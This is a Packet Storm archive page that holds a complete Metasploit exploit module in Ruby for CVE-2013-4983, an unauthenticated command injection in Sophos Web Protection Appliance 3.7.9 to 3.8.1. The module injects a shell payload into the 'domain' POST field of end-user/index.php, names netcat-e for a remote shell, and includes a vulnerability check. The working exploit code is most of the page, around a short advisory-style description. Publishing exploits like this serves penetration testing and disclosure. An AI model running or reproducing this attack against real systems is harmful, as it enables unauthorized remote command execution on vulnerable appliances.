what you don't know can hurt you

Sophos Web Protection Appliance sblistpack Arbitrary Command Execution

Sophos Web Protection Appliance sblistpack Arbitrary Command Execution
Posted Sep 17, 2013
Authored by Francisco Falcon, juan vazquez | Site metasploit.com

This Metasploit module exploits a command injection vulnerability on Sophos Web Protection Appliance 3.7.9, 3.8.0 and 3.8.1. The vulnerability exists on the sblistpack component, reachable from the web interface without authentication. This Metasploit module has been tested successfully on Sophos Virtual Web Appliance 3.7.0.

tags | exploit, web
advisories | CVE-2013-4983, OSVDB-97029
MD5 | efad4b08bc7895d76145207b6fc9645d

Sophos Web Protection Appliance sblistpack Arbitrary Command Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Protection Appliance sblistpack Arbitrary Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability on Sophos Web Protection Appliance
3.7.9, 3.8.0 and 3.8.1. The vulnerability exists on the sblistpack component, reachable
from the web interface without authentication. This module has been tested successfully
on Sophos Virtual Web Appliance 3.7.0.
},
'Author' =>
[
'Francisco Falcon', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-4983' ],
[ 'OSVDB', '97029' ],
[ 'BID', '62263'],
[ 'EDB', '28175'],
[ 'URL', 'http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x27\x22\x5c",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat-e' # Because quotes and double-quotes aren't valid
}
},
'Targets' =>
[
[ 'Sophos Web Protection Appliance 3.7.0', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 06 2013'
))

register_options(
[
Opt::RPORT(443)
],
self.class
)

end

def check
url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
domain = "http://#{rand_text_alpha(10 + rand(10))}.com"
res = send_exploit_query(url, domain)

if res and res.code == 302 and res.headers.include?('Location') and res.headers['Location'] =~ /#{url}/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end

def exploit
print_status("#{rhost}:#{rport} - Executing payload...")
url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
# very short timeout because the request may never return if we're
# sending a socket payload
send_exploit_query(url, domain, 0.01)
end

def send_exploit_query(url, domain, timeout = 20)
user = rand_text_alpha(8 + rand(5))
res = send_request_cgi({
'uri' => normalize_uri('end-user', 'index.php'),
'method' => 'POST',
'vars_get' => {
'c' =>'blocked',
'action' => 'continue'
},
'vars_post' => {
'url' => "#{Rex::Text.encode_base64(url)}",
'args_reason' => rand_text_alpha(15 + rand(5)),
'filetype' => rand_text_alpha(15 + rand(5)),
'user' => user,
'user_encoded' => "#{Rex::Text.encode_base64(user)}",
'domain' => domain,
'raw_category_id' => "#{rand_text_alpha(4 + rand(8))}|#{rand_text_alpha(4 + rand(8))}"
}
}, timeout)

return res
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    31 Files
  • 8
    Apr 8th
    18 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close